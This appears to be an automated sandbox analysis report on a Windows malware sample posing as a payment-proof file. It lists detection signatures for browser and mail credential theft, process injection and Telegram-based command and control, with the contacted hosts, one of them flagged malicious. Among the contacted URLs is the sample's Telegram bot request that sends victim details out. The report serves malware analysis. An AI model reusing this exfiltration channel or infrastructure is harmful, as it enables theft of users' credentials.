behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1557792 Sample: z30ProofofPaymentAttached.exe Startdate: 18/11/2024 Architecture: WINDOWS Score: 100 14 reallyfreegeoip.org 2->14 16 api.telegram.org 2->16 18 3 other IPs or domains 2->18 26 Found malware configuration 2->26 28 Malicious sample detected (through community Yara rule) 2->28 30 Multi AV Scanner detection for submitted file 2->30 36 8 other signatures 2->36 7 z30ProofofPaymentAttached.exe 2 2->7         started        signatures3 32 Tries to detect the country of the analysis system (by using the IP) 14->32 34 Uses the Telegram API (likely for C&C communication) 16->34 process4 signatures5 38 Binary is likely a compiled AutoIt script file 7->38 40 Writes to foreign memory regions 7->40 42 Maps a DLL or memory area into another process 7->42 44 Switches to a custom stack to bypass stack traces 7->44 10 RegSvcs.exe 15 2 7->10         started        process6 dnsIp7 20 mzgold.ir 217.144.107.148, 49813, 49850, 49941 NETMIHANIR Iran (ISLAMIC Republic Of) 10->20 22 api.telegram.org 149.154.167.220, 443, 49780 TELEGRAMRU United Kingdom 10->22 24 2 other IPs or domains 10->24 46 Tries to steal Mail credentials (via file / registry access) 10->46 48 Tries to harvest and steal browser information (history, passwords, etc) 10->48 signatures8
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
149.154.167.220
 api.telegram.org United Kingdom
62041 TELEGRAMRU false
188.114.97.3
 reallyfreegeoip.org European Union
13335 CLOUDFLARENETUS false
193.122.6.168
 checkip.dyndns.com United States
31898 ORACLE-BMC-31898US false
217.144.107.148
 mzgold.ir Iran (ISLAMIC Republic Of)
204213 NETMIHANIR true

Contacted Domains

Name IP Active
mzgold.ir 217.144.107.148 true
reallyfreegeoip.org 188.114.97.3 true
api.telegram.org 149.154.167.220 true
checkip.dyndns.com 193.122.6.168 true
checkip.dyndns.org unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:648351%0D%0ADate%20and%20Time:%2019/11/2024%20/%2005:20:42%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20648351%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D false
    		high
    http://checkip.dyndns.org/ false
      		high
      https://reallyfreegeoip.org/xml/155.94.241.187 false
        		high